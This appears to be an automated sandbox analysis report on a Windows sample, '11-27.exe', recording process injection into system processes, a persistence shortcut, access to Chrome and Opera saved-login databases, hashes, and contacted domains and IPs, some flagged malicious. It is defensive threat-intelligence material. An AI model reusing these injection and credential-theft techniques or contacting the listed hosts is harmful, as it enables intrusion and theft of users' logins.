Source: C:\Users\user\Desktop\11-27.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 3440	Jump to behavior

Source: C:\Users\user\Desktop\11-27.exe	Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 950000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 80000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 90000	Jump to behavior

Source: explorer.exe, 00000001.00000000.355191624.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.606829673.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.355191624.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.606829673.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.355191624.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.606829673.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000001.00000000.355191624.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.606829673.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
198.20.71.158	unknown	United States	32475	SINGLEHOP-LLCUS	true
162.159.136.232	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.130.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.129.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.128.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.135.233	unknown	United States	13335	CLOUDFLARENETUS	false
213.171.195.105	unknown	United Kingdom	8560	ONEANDONE-ASBrauerstrasse48DE	true

Name	IP	Active
horne-construction.com	198.20.71.158	true
www.systemmigrationservices.com	213.171.195.105	true
discord.com	162.159.136.232	true
cdn.discordapp.com	162.159.129.233	true
www.milavins.com	unknown	unknown
g.msn.com	unknown	unknown
www.horne-construction.com	unknown	unknown

Analysis Report 11-27.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	324075
Product:	CloudBasic
Start time:	10:23:55
Start date:	28.11.2020
Sample:	11-27.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	4312f55eb22b6cd52d0f6f93f40215af
SHA1:	a0439365d1f3e47d03729760aaaafd5f10991d53
SHA256:	4b5650a097c6a9ee7bc32fb5aa691ce1d1f358bcbdcbccfc6ba66d2f76f612af
Filetype:	Win32 Executable (generic) a (10002005/4) 99.24%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	PE32 executable (GUI) Intel 80386, for MS Windows	4312F55EB22B6CD52D0F6F93F40215AF	A0439365D1F3E47D03729760AAAAFD5F10991D53	4B5650A097C6A9EE7BC32FB5AA691CE1D1F358BCBDCBCCFC6BA66D2F76F612AF
C:\Users\user\AppData\Local\Temp\DB1	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\tpmH.url	MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Hmptdrv.exe>), ASCII text, with CRLF line terminators	BCF31FFF2A1B5C83536F77B07774DA71	2A39455E4C88A5E846D02CDBF552CE1443D89861	D8816D5504659F8B83B983071F2EE2B10F6475A69393DDBCA863BE651BABC7E6
C:\Users\user\AppData\Roaming\7N4802EQ\7N4logim.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3	4C58EDC25E731504D6F806F1A8778C6B	132E89B1FE713E42A3E83511A9AA7F42E3C7290C	3B8DB97E3AF28C9836BED489FC8C22CBB38AD1A94D55FB63EE5DD0B043D9265A
C:\Users\user\AppData\Roaming\7N4802EQ\7N4logrg.ini	data	4AADF49FED30E4C9B3FE4A3DD6445EBE	1E332822167C6F351B99615EADA2C30A538FF037	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
C:\Users\user\AppData\Roaming\7N4802EQ\7N4logri.ini	data	D63A82E5D81E02E399090AF26DB0B9CB	91D0014C8F54743BBA141FD60C9D963F869D76C9	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
C:\Users\user\AppData\Roaming\7N4802EQ\7N4logrv.ini	data	494F210225AA08FC68B443BE927DEE67	1808AAD6DBE7CDDFCF7B1407911AAE84BE6B0AF2	154A6EFDF5C68EC0E913317DE33D38B847A40F2963831A93D443864CB9611731